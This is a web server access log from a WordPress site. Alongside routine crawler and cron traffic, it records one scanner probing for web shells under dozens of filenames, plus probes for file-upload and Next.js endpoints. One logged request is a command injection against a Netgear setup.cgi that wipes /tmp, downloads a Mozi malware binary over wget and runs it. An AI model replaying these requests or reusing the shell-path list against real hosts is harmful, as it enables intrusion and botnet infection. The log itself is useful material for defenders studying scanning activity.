4.147.187.31 - - [05/Feb/2026:18:00:42 +0800] "GET /bay11.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:42 +0800] "GET /41.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:42 +0800] "GET /zc-845.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:42 +0800] "GET /wsdxoeas.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:42 +0800] "GET /ww.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:42 +0800] "GET /mode.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:43 +0800] "GET /editor.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:43 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:44 +0800] "GET /star.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:44 +0800] "GET /yas.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:44 +0800] "GET /timocra.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:44 +0800] "GET /lock1.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:44 +0800] "GET /content.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:44 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:45 +0800] "GET /wp-good.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:46 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [05/Feb/2026:18:00:47 +0800] "POST /wp-cron.php?doing_wp_cron=1770285647.3269441127777099609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
4.147.187.31 - - [05/Feb/2026:18:00:47 +0800] "GET /w3llscc%20-%20Copy.php7 HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:47 +0800] "GET /muzu.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:48 +0800] "GET /pegi.PhP8 HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:48 +0800] "GET /wp-admin/images/admin.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:49 +0800] "GET /wp-shirei.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:49 +0800] "GET /hlonk.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:49 +0800] "GET /ova.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:49 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:51 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:51 +0800] "GET /ar.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:51 +0800] "GET /html.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:53 +0800] "GET /htio.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:53 +0800] "GET /xy.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:54 +0800] "GET /abc.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:54 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:54 +0800] "GET /403.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:54 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:54 +0800] "GET /includes/phpinfo.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:54 +0800] "GET /gtc.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:55 +0800] "GET /mk.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:55 +0800] "GET /wp-tot.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:58 +0800] "GET /gifclass.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:58 +0800] "GET /33.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:58 +0800] "GET /acxx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:58 +0800] "GET /cah.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:58 +0800] "GET /gg.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /css/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /x7.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /assets/as.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /wsd.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /panel.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /ty.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:00:59 +0800] "GET /rzki.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:00 +0800] "GET /zfile.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:00 +0800] "GET /yasnu.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:00 +0800] "GET /bs2.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:01 +0800] "GET /wp-load.php HTTP/1.1" 200 5 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:01 +0800] "GET /wp-admin/maint/about.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:01 +0800] "GET //cwclass.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:01 +0800] "GET /class.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:01 +0800] "GET /a2.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:02 +0800] "GET /503.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:02 +0800] "GET /wp-ann.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:02 +0800] "GET /xmrlpc.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:02 +0800] "GET /yawa.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:02 +0800] "GET /environment.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:02 +0800] "GET /indeex.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:03 +0800] "GET /custom-background.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:03 +0800] "GET /ziwopudm.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:03 +0800] "GET /fileupload.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:03 +0800] "GET /alfa-rex.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:04 +0800] "GET /yanz.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:05 +0800] "GET /class19.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:05 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:05 +0800] "GET /cczkdmdy.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:05 +0800] "GET /wbbw.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:05 +0800] "GET /item.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:05 +0800] "GET /alfashell.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:06 +0800] "GET /wp-includes/assets/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:06 +0800] "GET /mah/xBrain.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:06 +0800] "GET /akcc.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:06 +0800] "GET /aboutc.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:06 +0800] "GET /ccou.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:07 +0800] "GET /oo.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:07 +0800] "GET /wp-content/lock360.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:07 +0800] "GET /okxh.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:08 +0800] "GET /log.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:08 +0800] "GET /gettest.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:08 +0800] "GET /set.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:09 +0800] "GET /ioxi.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [05/Feb/2026:18:01:10 +0800] "POST /wp-cron.php?doing_wp_cron=1770285670.0471940040588378906250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
4.147.187.31 - - [05/Feb/2026:18:01:10 +0800] "GET /retu11.PhP7 HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:10 +0800] "GET /ar/mgsl.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:11 +0800] "GET /living.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:11 +0800] "GET /elp.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:11 +0800] "GET /dev1s.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:11 +0800] "GET /az.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:12 +0800] "GET /yaiid.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:12 +0800] "GET /siteheads.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:13 +0800] "GET /zzxy.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:17 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:17 +0800] "GET /revision.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:17 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:17 +0800] "GET /wp-4doption1.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:18 +0800] "GET /ioxi001.PhP7 HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:19 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:20 +0800] "GET /kdgok.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:20 +0800] "GET /wp-themes.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:20 +0800] "GET /backup.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:20 +0800] "GET /wp-admin/js/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:20 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:21 +0800] "GET /sx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:21 +0800] "GET /wp-includes/js/codemirror/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:21 +0800] "GET /wp-site.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:21 +0800] "GET /fck.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:21 +0800] "GET /zr.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:21 +0800] "GET /12.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:22 +0800] "GET /hilk.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:22 +0800] "GET /w3llscc.php7 HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:23 +0800] "GET /baixy.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:23 +0800] "GET /css/radio.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:23 +0800] "GET /wen.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:24 +0800] "GET /docs.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:24 +0800] "GET /000.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:24 +0800] "GET /bgymj.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:25 +0800] "GET /0x.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:26 +0800] "GET /wp-ait.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:26 +0800] "GET /test1.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:26 +0800] "GET /dex.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:26 +0800] "GET /xxm.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:26 +0800] "GET /size.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:26 +0800] "GET /wb.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:27 +0800] "GET /w3lls.php7 HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:28 +0800] "GET /mini.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:28 +0800] "GET /v2.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:28 +0800] "GET /js/sxx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:28 +0800] "GET /img.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:28 +0800] "GET /yifsx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:28 +0800] "GET /sym403.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:29 +0800] "GET /ans.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:29 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:29 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:30 +0800] "GET /zoo.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:30 +0800] "GET /rum.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:30 +0800] "GET /wp-admin/maint/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:30 +0800] "GET /zwso.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:31 +0800] "GET /yr.PHP HTTP/1.1" 404 31367 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:31 +0800] "GET /8xyz.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:31 +0800] "GET /wp-admin/maint/admin.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:32 +0800] "GET /wp-includes/Text/about.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:32 +0800] "GET /styles.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:32 +0800] "GET /wp-includes/block-patterns/index.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:32 +0800] "GET /aq.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:33 +0800] "GET /lock2.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:33 +0800] "GET /menu.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:33 +0800] "GET /vx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:33 +0800] "GET /tmpls.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:33 +0800] "GET /xx.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:33 +0800] "GET /ran.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:34 +0800] "GET /priv.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:34 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
4.147.187.31 - - [05/Feb/2026:18:01:34 +0800] "GET /sim.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [05/Feb/2026:18:03:51 +0800] "POST /wp-cron.php?doing_wp_cron=1770285831.8095109462738037109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
170.106.143.6 - - [05/Feb/2026:18:03:51 +0800] "GET / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Feb/2026:18:10:54 +0800] "POST /wp-cron.php?doing_wp_cron=1770286254.7472939491271972656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
66.249.74.8 - - [05/Feb/2026:18:10:54 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 404 8952 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [05/Feb/2026:18:16:53 +0800] "POST /wp-cron.php?doing_wp_cron=1770286613.4209189414978027343750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.69 - - [05/Feb/2026:18:16:53 +0800] "GET / HTTP/1.1" 200 157284 "-" "-"
36.133.115.36 - - [05/Feb/2026:18:18:58 +0800] "POST /wp-cron.php?doing_wp_cron=1770286738.1640040874481201171875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
93.158.213.26 - - [05/Feb/2026:18:18:58 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
93.158.213.26 - - [05/Feb/2026:18:19:01 +0800] "GET /portfolio-tag/%E9%9E%8D%E9%92%A2%E8%92%82%E6%A3%AE/ HTTP/1.1" 404 8950 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
93.158.213.26 - - [05/Feb/2026:18:19:06 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [05/Feb/2026:18:19:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770286748.7977418899536132812500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
93.158.213.26 - - [05/Feb/2026:18:19:08 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
93.158.213.26 - - [05/Feb/2026:18:19:10 +0800] "GET /tag/%E5%8D%9A%E8%81%94%E8%BE%BE/ HTTP/1.1" 200 20948 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
93.158.213.26 - - [05/Feb/2026:18:19:12 +0800] "GET /tag/%E7%89%A9%E6%B5%81/ HTTP/1.1" 200 20931 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
47.114.89.255 - - [05/Feb/2026:18:19:39 +0800] "GET /admin_xs/pics/diyUpload/preview.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
47.114.89.255 - - [05/Feb/2026:18:19:40 +0800] "GET /admin_xs/pics/diyUpload/fileupload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
47.95.198.251 - - [05/Feb/2026:18:26:23 +0800] "GET /public/admin/temp2/Widget/webuploader/0.1.5/server/preview.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
47.95.198.251 - - [05/Feb/2026:18:26:23 +0800] "GET /public/admin/temp2/Widget/webuploader/0.1.5/server/fileupload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [05/Feb/2026:18:35:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770287708.7492189407348632812500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [05/Feb/2026:18:35:09 +0800] "POST / HTTP/1.1" 200 34752 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [05/Feb/2026:18:38:33 +0800] "POST /wp-cron.php?doing_wp_cron=1770287913.5409998893737792968750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [05/Feb/2026:18:38:33 +0800] "GET / HTTP/1.1" 200 34754 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Feb/2026:18:53:54 +0800] "POST /wp-cron.php?doing_wp_cron=1770288834.3693180084228515625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
125.47.109.252 - - [05/Feb/2026:18:53:54 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.47.109.252:34240/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 31354 "-" "-"
40.77.167.57 - - [05/Feb/2026:19:16:18 +0800] "GET /wp-content/uploads/2025/09/1756868614-20250903104654_74_5.webp HTTP/1.1" 200 47858 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Feb/2026:19:33:01 +0800] "POST /wp-cron.php?doing_wp_cron=1770291181.2769169807434082031250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [05/Feb/2026:19:33:01 +0800] "GET / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.167.144.229 - - [05/Feb/2026:19:35:23 +0800] "GET /wp-content/uploads/2025/12/1766064629-Article_images_20251218212623.webp HTTP/1.1" 200 20366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Feb/2026:19:36:02 +0800] "POST /wp-cron.php?doing_wp_cron=1770291362.4147279262542724609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
85.208.96.203 - - [05/Feb/2026:19:36:02 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [05/Feb/2026:19:36:05 +0800] "GET /2162/ HTTP/1.1" 200 25059 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
180.153.236.60 - - [05/Feb/2026:19:46:15 +0800] "GET / HTTP/1.1" 200 35185 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [05/Feb/2026:19:51:23 +0800] "POST /wp-cron.php?doing_wp_cron=1770292283.6363890171051025390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [05/Feb/2026:19:51:24 +0800] "POST / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [05/Feb/2026:19:59:31 +0800] "POST /wp-cron.php?doing_wp_cron=1770292771.2413949966430664062500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
2.58.56.147 - - [05/Feb/2026:19:59:31 +0800] "POST / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0"
2.58.56.147 - - [05/Feb/2026:19:59:36 +0800] "POST /_next HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36"
2.58.56.147 - - [05/Feb/2026:19:59:38 +0800] "POST /api HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
2.58.56.147 - - [05/Feb/2026:19:59:39 +0800] "POST /_next/server HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
2.58.56.147 - - [05/Feb/2026:19:59:41 +0800] "POST /app HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136."
2.58.56.147 - - [05/Feb/2026:19:59:43 +0800] "POST /api/route HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
36.133.115.36 - - [05/Feb/2026:20:09:07 +0800] "POST /wp-cron.php?doing_wp_cron=1770293347.8699700832366943359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.157.148.38 - - [05/Feb/2026:20:09:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
